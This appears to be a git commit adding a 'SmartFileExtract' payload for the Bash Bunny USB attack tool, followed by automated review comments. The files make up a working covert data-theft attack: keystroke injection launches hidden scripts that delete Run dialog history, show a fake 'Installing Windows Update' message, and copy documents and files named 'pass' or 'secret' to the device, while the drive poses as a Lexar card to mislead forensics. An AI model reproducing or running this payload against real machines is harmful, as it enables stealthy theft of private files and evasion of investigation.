Added SmartFileExtract payload (#296)

pull/297/merge
saintcrossbow 2017-11-26 20:16:17 -05:00 committed by Sebastian Kinne
parent 53cf608b7f
commit 08c24c4389
6 changed files with 86 additions and 0 deletions


@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit
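Review bot: the first `start /b /wait powershell.exe ... -command "$wsh = New-Object -ComObject WScript.Shell"` line is dead code in this file: it instantiates a COM object and then exits without using it, so the only effect is an extra PowerShell launch before `cscript` runs. Either add a `REM` stating what it is for or remove it. Minor: `%~dp0` already ends in a backslash, so `%~dp0\i.vbs` and `%~dp0\e.cmd` expand to paths with a doubled `\\`; Windows tolerates this, but the same idiom is repeated in e.cmd and is worth tidying consistently.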


@ -0,0 +1,25 @@
REM Setup required:
REM o Create SFE in the loot directory
REM o Place SmartFileExtract on the root of the bashbunny
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
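Review bot: the `if Exist %USERPROFILE%\Documents` guard does not match what the comments and README describe: the guard only checks that the Documents folder exists, while the SmartFileExtract call scans all of `/drive c`, so the condition neither restricts the search to Documents nor prevents it from running when Documents is absent but the drive is present. Document the intent or drop the guard. Two documentation points for the header: the `REG DELETE ...\RunMRU /f` anti-forensics step and the fake "Installing Windows Update" banner are not mentioned in the README's list of what the payload does, and from a defender's view the key deletion is itself an observable event (registry object deletions are logged by Sysmon Event ID 12 and by registry auditing), so it should be described rather than left implicit. Also a typo in the comment: "compromised of" should read "comprised of", and the `%date:~...%`/`%time:~...%` substring arithmetic assumes one specific locale date format, which is worth stating as a caveat in the setup notes.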


@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
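Review bot: this file has no header comment, unlike d.cmd, e.cmd and payload.txt. Add one line stating that it runs the path passed as `WScript.Arguments(0)`, that the second argument `0` is the hidden window style and that `False` means the script returns without waiting, since that is the behaviour the README refers to as executing e.cmd "invisibly".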


@ -0,0 +1,29 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn (original)
# Additions: SaintCrossbow (only for the parts to run SFE)
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
QUACK DELAY 200
REM --> Minimize all windows
QUACK WINDOWS d
QUACK DELAY 200
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
QUACK ENTER
LED G
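Review bot: the header comment is stale. It still describes the original ExecutableInstaller flow ("copies payload.exe from the root of the Bash Bunny and then executes it using the --startup parameter"), but the e.cmd shipped in this commit runs SmartFileExtract with `/file`, `/copyto`, `/curtain`, `/maxsec` and `/maxmbs` options and never touches a payload.exe; update the comment to match. Two logic points: `source bunny_helpers.sh` is loaded to obtain `SWITCH_POSITION`, yet the `QUACK STRING` line hardcodes `payloads\switch2\d.cmd`, so the payload silently fails if installed under switch1; either use the variable or remove the `source` line and state in the setup notes that switch2 is required. Finally, `REM --> Minimize all windows` is DuckyScript comment syntax inside a bash script; unless bunny_helpers.sh defines a `REM` function, bash will report "command not found" at that line. Use `#` for comments in payload.txt (or `QUACK REM` if it must remain DuckyScript).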


@ -0,0 +1 @@
# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied.
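Review bot: the "What is the payload setup to do?" list is incomplete relative to e.cmd. It should also state that the payload deletes the Run dialog history under `HKCU\...\Explorer\RunMRU`, that the `/curtain 3` option displays a fake install window together with an "Installing Windows Update" console message, and that found files land under `loot\SFE\<COMPUTERNAME>_<date>_<time>` rather than directly in the loot directory. The setup comment in e.cmd ("Create SFE in the loot directory") is also redundant with this README, because `mkdir %dst%` creates the intermediate `SFE` directory itself; pick one place to document the directory layout.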


@ -0,0 +1,26 @@
Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
See the BashBunny Wiki for the original version.
Setup:
- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
* Quick tip: you only need the SmartFileExtract.exe from the project root
- Copy SmartFileExtract.exe to the root of the bashubunny
- Change payload.txt:
a) Your file volume name for the bashbunny (if necessary)
b) What kind of device you want the bunny to spoof.
Note: Very much recommend you do this, otherwise will be picked up by forensics
- Change e.cmd:
a) Change your options for Smart File Extract here.
The default payload included in this distribution:
- Looks to Forensics like a Lexar drive (but still called BashBunny)
- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
- Reports status as a fake install window
- Stops extract after 90 seconds or 500 MBs
SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
smartfileextract /help
Good luck!
Saint Crossbow
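Review bot: typo in the setup steps: "bashubunny" should be "bashbunny". Steps a) and b) under "Change payload.txt" should name the lines they refer to, since the reader has to locate them: the volume name is the `label=''BashBunny''` filter inside the `QUACK STRING powershell ...` line, and the device identity is the `ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081` line. The note "otherwise will be picked up by forensics" overstates what changing VID/PID achieves: Windows still records the device's VID, PID and serial under the USBSTOR registry keys and in setupapi logs, and the default payload, as the next section admits, still presents the volume label "BashBunny", so the artifact is altered, not removed. Phrase it as a caveat rather than a guarantee.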